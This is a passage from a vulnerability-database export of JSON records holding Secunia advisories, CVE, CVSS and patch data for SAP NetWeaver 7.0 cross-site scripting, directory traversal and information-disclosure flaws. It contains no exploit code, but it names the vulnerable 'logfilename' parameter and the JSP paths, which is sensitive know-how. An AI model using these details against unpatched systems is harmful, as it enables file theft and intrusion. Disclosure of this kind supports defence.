Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"db": "BID",
"id": "47391"
},
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "100487"
},
{
"db": "PACKETSTORM",
"id": "100482"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "47391",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2011-1479",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-1480",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "44205",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "44206",
"trust": 0.7
},
{
"db": "IVD",
"id": "73729EFE-1F98-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "71ACFD58-1F98-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "100487",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "100482",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"db": "BID",
"id": "47391"
},
{
"db": "PACKETSTORM",
"id": "100487"
},
{
"db": "PACKETSTORM",
"id": "100482"
}
]
},
"id": "VAR-201104-0314",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
}
],
"trust": 2.2303438633333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
}
]
},
"last_update_date": "2022-05-17T22:51:51.672000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3559"
},
{
"title": "Patch for SAP NetWeaver Portal Path Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/3558"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/44205/http"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/44206/http"
},
{
"trust": 0.4,
"url": "http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-003"
},
{
"trust": 0.4,
"url": "http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-004"
},
{
"trust": 0.4,
"url": "http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-005"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.2,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.2,
"url": "http://secunia.com/blog/210"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1513182"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44206"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44206/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44206/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44205"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44205/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44205/#comments"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1512134"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"db": "BID",
"id": "47391"
},
{
"db": "PACKETSTORM",
"id": "100487"
},
{
"db": "PACKETSTORM",
"id": "100482"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"db": "BID",
"id": "47391"
},
{
"db": "PACKETSTORM",
"id": "100487"
},
{
"db": "PACKETSTORM",
"id": "100482"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-04-18T00:00:00",
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"date": "2011-04-18T00:00:00",
"db": "IVD",
"id": "71acfd58-1f98-11e6-abef-000c29c66e3d"
},
{
"date": "2011-04-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"date": "2011-04-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"date": "2011-04-15T00:00:00",
"db": "BID",
"id": "47391"
},
{
"date": "2011-04-17T06:24:57",
"db": "PACKETSTORM",
"id": "100487"
},
{
"date": "2011-04-15T01:21:31",
"db": "PACKETSTORM",
"id": "100482"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-04-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1479"
},
{
"date": "2011-04-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-1480"
},
{
"date": "2011-04-28T15:03:00",
"db": "BID",
"id": "47391"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "47391"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "73729efe-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1479"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Serialization Error",
"sources": [
{
"db": "BID",
"id": "47391"
}
],
"trust": 0.3
}
}
var-201202-0347
Vulnerability from variot
Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. Because the input passed to the b2b/admin/log_view.jsp or b2b/admin/log.jsp script in the Internet Sales module via the \"logfilename\" parameter is missing validation before being used to display the file, it can result in arbitrary files being obtained through the directory traversal sequence. information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including: 1. A cross-site scripting vulnerability 2. Multiple directory traversal vulnerabilities 3. Multiple information-disclosure vulnerabilities Attackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
TITLE: SAP NetWeaver Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA47861
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47861/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
RELEASE DATE: 2012-02-21
DISCUSS ADVISORY: http://secunia.com/advisories/47861/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/47861/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47861
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Digital Security Research Group has reported some vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks and by malicious users and malicious people to disclose sensitive information. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences.
Successful exploitation of vulnerabilities #1 and #2 may require permission to view logs.
The vulnerabilities are reported in version 7.0. Other versions may also be affected.
SOLUTION: Apply SAP Security Notes 1585527 and 1583300.
PROVIDED AND/OR DISCOVERED BY: Dmitriy Chastukhin, Digital Security Research Group.
ORIGINAL ADVISORY: Digital Security Research Group: http://dsecrg.com/pages/vul/show.php?id=412 http://dsecrg.com/pages/vul/show.php?id=413 http://dsecrg.com/pages/vul/show.php?id=414 http://dsecrg.com/pages/vul/show.php?id=415 http://dsecrg.com/pages/vul/show.php?id=416
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0347",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 5.7,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1291"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastukhin of Digital Security Research Group.",
"sources": [
{
"db": "BID",
"id": "52101"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1291",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2012-1291",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1291",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201202-445",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. Because the input passed to the b2b/admin/log_view.jsp or b2b/admin/log.jsp script in the Internet Sales module via the \\\"logfilename\\\" parameter is missing validation before being used to display the file, it can result in arbitrary files being obtained through the directory traversal sequence. information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including:\n1. A cross-site scripting vulnerability\n2. Multiple directory traversal vulnerabilities\n3. Multiple information-disclosure vulnerabilities\nAttackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------\n\nSecunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March\nListen to our Chief Security Specialist, Research Analyst Director, and Director Product Management \u0026 Quality Assurance discuss the industry\u0027s key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA47861\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47861/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nRELEASE DATE:\n2012-02-21\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47861/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47861/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nDigital Security Research Group has reported some vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to conduct\ncross-site scripting attacks and by malicious users and malicious\npeople to disclose sensitive information. \nThis can be exploited to disclose the contents of arbitrary files via\ndirectory traversal sequences. This can be exploited to disclose the contents of\narbitrary files via directory traversal sequences. \n\nSuccessful exploitation of vulnerabilities #1 and #2 may require\npermission to view logs. \n\nThe vulnerabilities are reported in version 7.0. Other versions may\nalso be affected. \n\nSOLUTION:\nApply SAP Security Notes 1585527 and 1583300. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitriy Chastukhin, Digital Security Research Group. \n\nORIGINAL ADVISORY:\nDigital Security Research Group:\nhttp://dsecrg.com/pages/vul/show.php?id=412\nhttp://dsecrg.com/pages/vul/show.php?id=413\nhttp://dsecrg.com/pages/vul/show.php?id=414\nhttp://dsecrg.com/pages/vul/show.php?id=415\nhttp://dsecrg.com/pages/vul/show.php?id=416\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "PACKETSTORM",
"id": "110028"
}
],
"trust": 4.68
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "52101",
"trust": 4.9
},
{
"db": "SECUNIA",
"id": "47861",
"trust": 4.7
},
{
"db": "NVD",
"id": "CVE-2012-1291",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0825",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0822",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0826",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0827",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0823",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201202-445",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "110028",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"id": "VAR-201202-0347",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
],
"trust": 2.67111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 2.4
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
]
},
"last_update_date": "2023-12-18T12:10:13.921000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability (CNVD-2012-0825)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10773"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0822)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10771"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0826)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10774"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0827)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10775"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0823)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10772"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
